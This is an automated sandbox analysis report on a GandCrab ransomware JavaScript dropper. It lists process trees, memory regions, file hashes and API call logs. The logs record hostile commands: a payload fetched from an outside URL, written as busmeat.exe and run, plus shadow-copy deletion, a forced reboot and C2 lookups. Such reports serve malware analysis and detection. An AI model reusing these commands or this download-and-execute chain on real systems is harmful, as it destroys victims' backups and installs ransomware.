Javascript Dropper #2 - Gandcrab Analysis | Sequential Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win10_64 | windows_script_file
Classification: Dropper, Trojan, Downloader, Ransomware

e7851a1b3e93968e7f6b92a1a3f59d250402be15a5bcb3262acff1e0a27b912c (SHA256)

bill_87448680672-2706201981722018_4_23_b83d95.pdf.js

JScript

Created at 2018-05-07 10:12:00

Notifications (1/1)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xd98 Analysis Target High (Elevated) cscript.exe "C:\Windows\System32\CScript.exe" "C:\Users\CIIHMN~1\Desktop\BILL_8~1.JS" -
#3 0xed0 Child Process High (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe #1
#5 0xef8 Child Process High (Elevated) busmeat.exe C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe #3
#6 0x950 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #5
#8 0xb10 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #5
#10 0xd0c Child Process System (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #5
#12 0xd08 Child Process System (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f #5

Behavior Information - Sequential View

Process #1: cscript.exe
95 10
»
Information Value
ID #1
File Name c:\windows\system32\cscript.exe
Command Line "C:\Windows\System32\CScript.exe" "C:\Users\CIIHMN~1\Desktop\BILL_8~1.JS"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:30, Reason: Analysis Target
Unmonitor End Time: 00:02:31, Reason: Terminated by Timeout
Monitor Duration 00:02:01
OS Process Information
»
Information Value
PID 0xd98
Parent PID 0x5dc (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x D9C
0x DB8
0x DBC
0x DC0
0x DC4
0x DC8
0x DCC
0x DD0
0x E98
0x ECC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x00000095b9640000 0x95b9640000 0x95b965ffff Private Memory Readable, Writable True False False -
pagefile_0x00000095b9640000 0x95b9640000 0x95b964ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000095b9650000 0x95b9650000 0x95b9656fff Private Memory Readable, Writable True False False -
pagefile_0x00000095b9660000 0x95b9660000 0x95b9673fff Pagefile Backed Memory Readable True False False -
private_0x00000095b9680000 0x95b9680000 0x95b977ffff Private Memory Readable, Writable True False False -
pagefile_0x00000095b9780000 0x95b9780000 0x95b9783fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000095b9790000 0x95b9790000 0x95b9790fff Pagefile Backed Memory Readable True False False -
private_0x00000095b97a0000 0x95b97a0000 0x95b97a1fff Private Memory Readable, Writable True False False -
private_0x00000095b97b0000 0x95b97b0000 0x95b97b6fff Private Memory Readable, Writable True False False -
cscript.exe.mui 0x95b97c0000 0x95b97c2fff Memory Mapped File Readable False False False -
private_0x00000095b97d0000 0x95b97d0000 0x95b97d0fff Private Memory Readable, Writable True False False -
private_0x00000095b97e0000 0x95b97e0000 0x95b97e0fff Private Memory Readable, Writable True False False -
cscript.exe 0x95b97f0000 0x95b97f8fff Memory Mapped File Readable True False False -
pagefile_0x00000095b9800000 0x95b9800000 0x95b9800fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000095b9800000 0x95b9800000 0x95b9803fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000095b9810000 0x95b9810000 0x95b9810fff Pagefile Backed Memory Readable True False False -
private_0x00000095b9820000 0x95b9820000 0x95b991ffff Private Memory Readable, Writable True False False -
locale.nls 0x95b9920000 0x95b99ddfff Memory Mapped File Readable False False False -
private_0x00000095b99e0000 0x95b99e0000 0x95b9adffff Private Memory Readable, Writable True False False -
pagefile_0x00000095b9ae0000 0x95b9ae0000 0x95b9ae0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000095b9af0000 0x95b9af0000 0x95b9af5fff Pagefile Backed Memory Readable True False False -
private_0x00000095b9af0000 0x95b9af0000 0x95b9afffff Private Memory Readable, Writable True False False -
pagefile_0x00000095b9b00000 0x95b9b00000 0x95b9b05fff Pagefile Backed Memory Readable True False False -
private_0x00000095b9b00000 0x95b9b00000 0x95b9b06fff Private Memory Readable, Writable True False False -
msmplics.dll 0x95b9b10000 0x95b9b11fff Memory Mapped File Readable False False False -
scrrun.dll 0x95b9b10000 0x95b9b1ffff Memory Mapped File Readable False False False -
msxml3r.dll 0x95b9b20000 0x95b9b20fff Memory Mapped File Readable False False False -
pagefile_0x00000095b9b30000 0x95b9b30000 0x95b9b30fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x95b9b40000 0x95b9b40fff Memory Mapped File Readable, Writable True True False
pagefile_0x00000095b9b50000 0x95b9b50000 0x95b9b50fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000095b9b60000 0x95b9b60000 0x95b9b61fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000095b9b60000 0x95b9b60000 0x95b9b6ffff Pagefile Backed Memory Readable True False False -
winnlsres.dll 0x95b9b70000 0x95b9b74fff Memory Mapped File Readable False False False -
winnlsres.dll.mui 0x95b9b80000 0x95b9b8ffff Memory Mapped File Readable False False False -
private_0x00000095b9b90000 0x95b9b90000 0x95b9b9ffff Private Memory Readable, Writable True False False -
pagefile_0x00000095b9ba0000 0x95b9ba0000 0x95b9d27fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000095b9d30000 0x95b9d30000 0x95b9eb0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000095b9ec0000 0x95b9ec0000 0x95bb2bffff Pagefile Backed Memory Readable True False False -
rpcss.dll 0x95bb2c0000 0x95bb395fff Memory Mapped File Readable False False False -
private_0x00000095bb2c0000 0x95bb2c0000 0x95bb42ffff Private Memory Readable, Writable True False False -
private_0x00000095bb2c0000 0x95bb2c0000 0x95bb3bffff Private Memory Readable, Writable True False False -
mswsock.dll.mui 0x95bb3c0000 0x95bb3c2fff Memory Mapped File Readable False False False -
private_0x00000095bb420000 0x95bb420000 0x95bb42ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x95bb430000 0x95bb766fff Memory Mapped File Readable False False False -
pagefile_0x00000095bb770000 0x95bb770000 0x95bb827fff Pagefile Backed Memory Readable True False False -
private_0x00000095bb830000 0x95bb830000 0x95bb92ffff Private Memory Readable, Writable True False False -
pagefile_0x00000095bb930000 0x95bb930000 0x95bc92ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000095bb930000 0x95bb930000 0x95bba2ffff Private Memory Readable, Writable True False False -
private_0x00000095bba30000 0x95bba30000 0x95bbbaffff Private Memory Readable, Writable True False False -
private_0x00000095bba30000 0x95bba30000 0x95bbb2ffff Private Memory Readable, Writable True False False -
private_0x00000095bbba0000 0x95bbba0000 0x95bbbaffff Private Memory Readable, Writable True False False -
private_0x00000095bbbb0000 0x95bbbb0000 0x95bbcaffff Private Memory Readable, Writable True False False -
private_0x00000095bbcb0000 0x95bbcb0000 0x95bbdaffff Private Memory Readable, Writable True False False -
private_0x00000095bbdb0000 0x95bbdb0000 0x95bbeaffff Private Memory Readable, Writable True False False -
private_0x00000095bbeb0000 0x95bbeb0000 0x95bbfeffff Private Memory Readable, Writable True False False -
private_0x00000095bbeb0000 0x95bbeb0000 0x95bbf7ffff Private Memory Readable, Writable True False False -
private_0x00000095bbfe0000 0x95bbfe0000 0x95bbfeffff Private Memory Readable, Writable True False False -
private_0x00000095bbff0000 0x95bbff0000 0x95bc18ffff Private Memory Readable, Writable True False False -
private_0x00000095bbff0000 0x95bbff0000 0x95bc0dffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x95bbff0000 0x95bc0cefff Memory Mapped File Readable False False False -
private_0x00000095bc0d0000 0x95bc0d0000 0x95bc0dffff Private Memory Readable, Writable True False False -
private_0x00000095bc180000 0x95bc180000 0x95bc18ffff Private Memory Readable, Writable True False False -
private_0x00000095bc190000 0x95bc190000 0x95bc2bffff Private Memory Readable, Writable True False False -
private_0x00000095bc190000 0x95bc190000 0x95bc28ffff Private Memory Readable, Writable True False False -
private_0x00000095bc2b0000 0x95bc2b0000 0x95bc2bffff Private Memory Readable, Writable True False False -
private_0x00000095bc2c0000 0x95bc2c0000 0x95bc6bffff Private Memory Readable, Writable True False False -
private_0x00000095bc6c0000 0x95bc6c0000 0x95bc7bffff Private Memory Readable, Writable True False False -
private_0x00000095bc7c0000 0x95bc7c0000 0x95bc8bffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ff730000 0x7df5ff730000 0x7ff5ff72ffff Pagefile Backed Memory - True False False -
private_0x00007ff6df558000 0x7ff6df558000 0x7ff6df559fff Private Memory Readable, Writable True False False -
private_0x00007ff6df55a000 0x7ff6df55a000 0x7ff6df55bfff Private Memory Readable, Writable True False False -
private_0x00007ff6df55c000 0x7ff6df55c000 0x7ff6df55dfff Private Memory Readable, Writable True False False -
private_0x00007ff6df55e000 0x7ff6df55e000 0x7ff6df55ffff Private Memory Readable, Writable True False False -
pagefile_0x00007ff6df560000 0x7ff6df560000 0x7ff6df65ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6df660000 0x7ff6df660000 0x7ff6df682fff Pagefile Backed Memory Readable True False False -
private_0x00007ff6df684000 0x7ff6df684000 0x7ff6df685fff Private Memory Readable, Writable True False False -
private_0x00007ff6df686000 0x7ff6df686000 0x7ff6df687fff Private Memory Readable, Writable True False False -
private_0x00007ff6df688000 0x7ff6df688000 0x7ff6df689fff Private Memory Readable, Writable True False False -
private_0x00007ff6df68a000 0x7ff6df68a000 0x7ff6df68bfff Private Memory Readable, Writable True False False -
private_0x00007ff6df68c000 0x7ff6df68c000 0x7ff6df68dfff Private Memory Readable, Writable True False False -
private_0x00007ff6df68e000 0x7ff6df68e000 0x7ff6df68efff Private Memory Readable, Writable True False False -
cscript.exe 0x7ff6dfd80000 0x7ff6dfdaefff Memory Mapped File Readable, Writable, Executable True False False -
msado15.dll 0x7ffbeab10000 0x7ffbeac46fff Memory Mapped File Readable, Writable, Executable False False False -
wshom.ocx 0x7ffbeac50000 0x7ffbeac78fff Memory Mapped File Readable, Writable, Executable True False False -
msxml3.dll 0x7ffbebc20000 0x7ffbebe56fff Memory Mapped File Readable, Writable, Executable False False False -
scrrun.dll 0x7ffbec060000 0x7ffbec094fff Memory Mapped File Readable, Writable, Executable False False False -
mpclient.dll 0x7ffbed080000 0x7ffbed159fff Memory Mapped File Readable, Writable, Executable False False False -
scrobj.dll 0x7ffbed160000 0x7ffbed1a3fff Memory Mapped File Readable, Writable, Executable True False False -
comctl32.dll 0x7ffbed1b0000 0x7ffbed259fff Memory Mapped File Readable, Writable, Executable False False False -
wshext.dll 0x7ffbed260000 0x7ffbed27cfff Memory Mapped File Readable, Writable, Executable True False False -
mpoav.dll 0x7ffbed280000 0x7ffbed29cfff Memory Mapped File Readable, Writable, Executable False False False -
jscript.dll 0x7ffbed2a0000 0x7ffbed36dfff Memory Mapped File Readable, Writable, Executable True False False -
mlang.dll 0x7ffbedf30000 0x7ffbedf6cfff Memory Mapped File Readable, Writable, Executable False False False -
webio.dll 0x7ffbf25b0000 0x7ffbf262ffff Memory Mapped File Readable, Writable, Executable False False False -
wldp.dll 0x7ffbf39b0000 0x7ffbf39bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffbf5c50000 0x7ffbf5ef6fff Memory Mapped File Readable, Writable, Executable False False False -
msisip.dll 0x7ffbf69c0000 0x7ffbf69cbfff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ffbf69d0000 0x7ffbf69dffff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffbf6fc0000 0x7ffbf7156fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x7ffbf9250000 0x7ffbf9264fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffbf9380000 0x7ffbf96f5fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x7ffbf9f50000 0x7ffbf9f59fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffbfb2c0000 0x7ffbfb2c9fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x7ffbfbb40000 0x7ffbfbc15fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x7ffbfced0000 0x7ffbfcf37fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x7ffbfe0d0000 0x7ffbfe0dafff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x7ffbfe0f0000 0x7ffbfe127fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffbfe9a0000 0x7ffbfe9c1fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffbff170000 0x7ffbff205fff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x7ffbff7c0000 0x7ffbff7e2fff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x7ffbffad0000 0x7ffbffaebfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffbffdc0000 0x7ffbffdf2fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x7ffbffeb0000 0x7ffbffecefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x7ffbfff10000 0x7ffbfffb7fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x7ffc00110000 0x7ffc0016cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffc00170000 0x7ffc00186fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffc002e0000 0x7ffc002eafff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffc004c0000 0x7ffc004ebfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffc006c0000 0x7ffc006e7fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffc006f0000 0x7ffc0075afff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x7ffc00760000 0x7ffc007f7fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffc008a0000 0x7ffc008e9fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffc008f0000 0x7ffc00902fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffc00910000 0x7ffc0091efff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffc00920000 0x7ffc00930fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffc00940000 0x7ffc00f67fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffc00fc0000 0x7ffc01072fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffc01080000 0x7ffc010d3fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffc01190000 0x7ffc01350fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc01360000 0x7ffc0153cfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffc01540000 0x7ffc015e4fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffc015f0000 0x7ffc01625fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffc01640000 0x7ffc016e5fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffc018a0000 0x7ffc01b1bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffc01dd0000 0x7ffc01ef5fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffc01f00000 0x7ffc0204dfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffc02050000 0x7ffc02057fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc02060000 0x7ffc020fcfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffc02100000 0x7ffc0215afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffc02160000 0x7ffc022bbfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffc022c0000 0x7ffc037e4fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffc037f0000 0x7ffc03974fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffc03980000 0x7ffc039e8fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffc03a50000 0x7ffc03aa0fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffc03b40000 0x7ffc03baefff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffc03bb0000 0x7ffc03cf0fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffc03d00000 0x7ffc03dbdfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc03dc0000 0x7ffc03e6cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 15 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmn~1\appdata\local\temp\busmeat.exe 231.51 KB MD5: 786b1337cdef1d420c863ec2080baebd
SHA1: d8af63fb8269b648e575ec1c7132af55c1517843
SHA256: 6a8d922e34de35ac074b7de54d71227fb1a1ed92b9cfbc4daf8d64a9c5bc46b8
False
Threads
Thread 0xd9c
94 10
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff6dfd80000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x7ffc03dc0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc03ddd550 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x7ffc03dc0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7ffc03de0f40 True 1
Fn
Module Get Filename module_name = c:\windows\system32\cscript.exe, process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 110 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\.JS True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\.JS, data = JSFile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Get Filename process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 260 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc03dc0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffc013cd460 True 1
Fn
Module Load module_name = amsi.dll, base_address = 0x7ffbf69d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffbf69d2260 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffbf69d26b0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffc01360000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffc013ba1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffc0141e790 True 1
Fn
COM Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Environment Get Environment String name = JS_PROFILER False 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 116234 True 2
Fn
File Create filename = C:\Users\CIIHMN~1\Desktop\BILL_8~1.JS, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\CIIHMN~1\Desktop\BILL_8~1.JS, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\CIIHMN~1\Desktop\BILL_8~1.JS, filename = C:\Users\CIIHMN~1\Desktop\BILL_8~1.JS, protection = PAGE_READONLY, maximum_size = 20728 True 1
Fn
Module Map C:\Users\CIIHMN~1\Desktop\BILL_8~1.JS, process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Unmap process_name = c:\windows\system32\cscript.exe True 1
Fn
Module Load module_name = WLDP.DLL, base_address = 0x7ffbf39b0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x7ffbf39b1010 True 1
Fn
Module Get Address module_name = c:\windows\system32\wldp.dll, function = WldpIsClassInApprovedList, address_out = 0x7ffbf39b3820 True 1
Fn
System Get Info type = System Directory True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7ffc01640000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7ffc0164a7d0 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7ffc01643ba0 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7ffc01656cc0 True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info type = size True 1
Fn
File Read size = 20728, size_out = 20728 True 1
Fn
Data
COM Create interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = Hardware Information True 1
Fn
COM Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 2087C2F4-2CEF-4953-A8AB-66779B670495, prog_id = WinHttp.WinHttpRequest.5.1 True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = F6D90F16-9C73-11D3-B32E-00C04F990BB4, prog_id = MSXML2.XMLHTTP True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = lxgcnmokgusvqx.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = / True 1
Fn
System Get Time type = Ticks, time = 134437 True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = zet.ge, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /wp/wp-admin/images/5555.exe True 1
Fn
Inet Send HTTP Request url = http://zet.ge/wp/wp-admin/images/5555.exe True 1
Fn
Inet Receive HTTP Status status = 200 True 2
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 True 1
Fn
Module Get Handle module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff6dfd80000 True 1
Fn
Module Get Address module_name = c:\windows\system32\cscript.exe, function = 1, address_out = 0x7ff6dfd81350 True 1
Fn
COM Get Class ID cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Read Response size_out = 237065 True 1
Fn
Data
File Create filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe True 1
Fn
File Write filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 237065 True 1
Fn
Data
Module Load module_name = shell32.dll, base_address = 0x7ffc022c0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x7ffc023a2460 True 1
Fn
